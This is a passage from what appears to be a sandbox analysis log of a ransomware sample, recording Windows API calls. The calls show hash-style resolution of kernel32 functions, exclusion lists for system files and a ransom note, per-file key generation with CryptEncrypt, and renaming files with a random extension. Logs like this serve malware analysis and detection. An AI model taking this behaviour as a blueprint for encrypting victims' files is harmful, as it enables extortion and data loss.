lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.630] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.630] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.630] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.630] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.630] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.630] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.630] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.630] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.630] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.630] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.631] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.631] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.631] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.631] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.631] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.631] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.631] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.631] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.631] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.631] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.631] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.631] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.631] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.631] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.631] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.631] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.631] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.632] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\vpyzRTKDjrNi.flv") returned 70 [0087.632] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\vpyzRTKDjrNi.flv.k56uSW") returned 77 [0087.632] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\vpyzRTKDjrNi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\vpyzrtkdjrni.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\vpyzRTKDjrNi.flv.k56uSW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\vpyzrtkdjrni.flv.k56usw"), dwFlags=0x0) returned 1 [0087.632] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.632] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.633] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.633] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d751d0, ftCreationTime.dwHighDateTime=0x1d4d080, ftLastAccessTime.dwLowDateTime=0x6e848cd0, ftLastAccessTime.dwHighDateTime=0x1d4ceb5, ftLastWriteTime.dwLowDateTime=0x6e848cd0, ftLastWriteTime.dwHighDateTime=0x1d4ceb5, nFileSizeHigh=0x0, nFileSizeLow=0x154cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="WS2pNj.mp4", cAlternateFileName="")) returned 1 [0087.633] lstrcmpiW (lpString1="WS2pNj.mp4", lpString2="DECRYPT-FILES.txt") returned 1 [0087.633] lstrcmpiW (lpString1="WS2pNj.mp4", lpString2="autorun.inf") returned 1 [0087.633] lstrcmpiW (lpString1="WS2pNj.mp4", lpString2="boot.ini") returned 1 [0087.633] lstrcmpiW (lpString1="WS2pNj.mp4", lpString2="desktop.ini") returned 1 [0087.633] lstrcmpiW (lpString1="WS2pNj.mp4", lpString2="ntuser.dat") returned 1 [0087.633] lstrcmpiW (lpString1="WS2pNj.mp4", lpString2="iconcache.db") returned 1 [0087.633] lstrcmpiW (lpString1="WS2pNj.mp4", lpString2="bootsect.bak") returned 1 [0087.633] lstrcmpiW (lpString1="WS2pNj.mp4", lpString2="ntuser.dat.log") returned 1 [0087.633] lstrcmpiW (lpString1="WS2pNj.mp4", lpString2="thumbs.db") returned 1 [0087.633] lstrcmpiW (lpString1="WS2pNj.mp4", lpString2="Bootfont.bin") returned 1 [0087.633] lstrlenW (lpString="WS2pNj.mp4") returned 10 [0087.633] lstrcmpiW (lpString1="mp4", lpString2="lnk") returned 1 [0087.633] lstrcmpiW (lpString1="mp4", lpString2="exe") returned 1 [0087.633] lstrcmpiW (lpString1="mp4", lpString2="sys") returned -1 [0087.633] lstrcmpiW (lpString1="mp4", lpString2="dll") returned 1 [0087.633] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.633] lstrlenW (lpString="WS2pNj.mp4") returned 10 [0087.633] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.633] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="WS2pNj.mp4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\WS2pNj.mp4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\WS2pNj.mp4" [0087.633] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\WS2pNj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ws2pnj.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.634] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=87243) returned 1 [0087.634] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.634] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.634] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.634] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.634] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.634] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.635] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0087.636] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.636] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.638] CloseHandle (hObject=0x42c) returned 1 [0087.638] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.638] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.639] CloseHandle (hObject=0x0) returned 0 [0087.639] CloseHandle (hObject=0x428) returned 1 [0087.639] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.639] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.639] GetTickCount () returned 0x114e5ae [0087.639] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.640] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.640] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.640] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.640] lstrlenA (lpString="kernel32.dll") returned 12 [0087.640] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.640] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.640] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.640] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.640] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.640] lstrlenA (lpString="ADDATOMA") returned 8 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.641] lstrlenA (lpString="ADDATOMW") returned 8 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.641] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.641] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.641] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.641] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.641] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.641] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.641] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.641] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.641] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.641] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.641] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.641] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.641] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.641] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.641] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.641] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.641] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.642] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.642] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.642] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.642] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.642] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.642] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.642] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.642] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.642] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.642] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.642] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.642] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.642] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.642] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.642] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.642] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.642] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.642] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.642] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.643] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.643] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.643] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.643] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.643] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.643] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.643] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.643] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.643] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.643] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.643] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.643] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.643] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.643] lstrlenA (lpString="BEEP") returned 4 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.643] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.643] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.643] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.643] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" 